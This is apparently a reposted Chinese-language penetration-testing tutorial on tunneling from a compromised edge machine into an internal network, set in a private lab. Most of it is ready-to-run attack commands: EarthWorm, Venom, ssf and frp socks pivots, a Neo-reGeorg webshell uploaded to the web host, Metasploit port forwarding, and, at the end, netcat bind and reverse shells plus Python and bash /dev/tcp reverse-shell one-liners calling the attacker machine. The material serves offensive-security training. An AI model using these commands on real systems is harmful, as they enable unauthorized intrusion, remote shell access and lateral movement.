内网穿透姿势汇总

gclome

原文链接:内网穿透姿势汇总

0x00 前言

在渗透中拿到一台边缘机器后剩余内网机器不出网的情况很常见，这时我们就需要把内网机器流量转到边缘机器上再进行访问，内网流量转出来的方法很多，在下面就介绍几种常见的方法

0x01 环境介绍
本地环境搭建：
边缘机器：

1. windows 7
   
2. ip:192.168.10.15（外）
   
3. 　192.168.52.143（内）
   
4. 目标机器:
   
5. windows 2008R2
   
6. ip:192.168.52.138
   
7. 攻击机器：
   
8. windows 2008
   
9. ip:192.168.10.3
   
10. kali:
    
11. msf5:192.168.10.14
    
12. msf6:192.168.10.11

复制代码

0x02 EarthWorm

将ew_for_windows上传到边缘机器

1.正向连接

适用于目标机器拥有一个外网ip

在win7机器上执行

1. ew -s ssocksd -l 888

复制代码

监听本机888端口。然后在2008r2机器上使用proxifier进行连接

​
​
​
​
2.反向连接
适用于边缘机器无公网ip
攻击机器上执行

1. ew_for_Win.exe -s rcsocks -l 1080 -e 1234

复制代码

​

对外1234端口转发到1080端口
然后边缘机器连接

ew_for_Win.exe -s rssocks -d 192.168.10.3 -e 1234

​
​
​
​
​
​

0x03 Neo-reGeorg
注：这里需要python环境，在2008R2上弄总是出错，切到物理机进行实验，原理相同
生成文件

1. python neoreg.py generate -k 123456

复制代码

​

在neoreg_servers目录下生成了木马文件
​
这里web机器解析php，所以我上传一个tunnel.php的马到web机器（win7）上
​
攻击机连接

1. python neoreg.py -k 123456 -u http://192.168.10.15/tunnel.php

复制代码

​​
​
​

0x04 Venom
攻击机器上执行

• 
  

admin.exe -lport 9999

​
边缘机器（win7）执行

1. agent.exe -rhost 192.168.10.3 -rport 9999

复制代码

​

攻击机查看反弹成功
​
执行命令

1. goto 1
   
2. socks 6666

复制代码

​
​
​
​

0x05 ssf
1.正向连接
把certs文件夹和ssfd上传到边缘机器
边缘机器开启1333端口

• 
  

ssfd.exe ‐p 1333
​

攻击机连接边缘机器的1333端口，并将数据转发给1222端口

1. ssfd.exe ‐D 1222 ‐p 1333 192.168.10.15

复制代码

2008r2出问题，换到物理机上执行

​
​
​
​
2.反向连接
攻击机本地监听1234端口，命令如下：

• 
  

ssfd.exe ‐p 1234

​
边缘机器连接1234端口，并将数据转发到12345端口，命令如下：

• 
  

ssf.exe ‐F 12345 ‐p 1234 192.168.10.3

此处没有实验成功，还是写下步骤
本地socks代理连接127.0.0.1 12345端口
​

0x06 frp
攻击机设置frps.ini

1. [common]
   
2. bind_port = 6666

复制代码

运行如下命令：

1. frps.exe -c frps.ini

复制代码

​


在边缘机器设置frpc.ini

1. [common]
   
2. server_addr = 192.168.10.3
   
3. server_port = 6666
   
4. [http_proxy]
   
5. type=tcp
   
6. remote_port=7777
   
7. plugin=socks5

复制代码

执行如下命令：
frpc.exe ‐c frpc.ini
​
监听本地7777端口
​
​
​

0x07 msf
在msf6下只剩下了socks_proxy这个模块
​
还是先修改proxychains4.conf这个配置文件
​
添加路由使用模块
​
这里注意一下，我们在运行之前先show options一下，发现默认是socks5
​

代理运行如果想使用socks4a代理，添加如下语句即可

• 
  

set version 4a

​
修改浏览器配置
​
成功访问内网资源
​
拓展：portfwd端口转发
portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地，并且监听，使用方法如下

1. portfwd add -l 3389 -r 192.168.52.138 -p 3389

复制代码

然后我们访问本地3389

0x08 nc

1.正向连接

需要目标有公网ip

目标机器

1. nc -lvp 4444 -e /bin/sh linux
   
2. nc -lvp 4444 -e c:\windows\system32\cmd.exe windows

复制代码

攻击机器

1. nc <目标机器ip> 4444

复制代码

​

​
​
2.反向连接
攻击机器监听本地1234端口

• 
  

nc -lvp 1234

​
目标机器执行

1. nc <ip> 1234 -e /bin/sh linux
   
2. nc <ip> 1234 -e cmd.exe windows

复制代码

​

​
在一般情况下目标机器是没有nc的，这里可以用其他工具或者编程语言来代替nc

• 
  

python反向shell

攻击机器：

• 
  

nc -lvp 2222

目标机器：

1. python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.10.3',2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

复制代码

bash反向shell

攻击机器：

1. nc -lvp 2222

复制代码

目标机器：

1. bash -i >& /dev/tcp/192.168.10.3/2222 0>&1

复制代码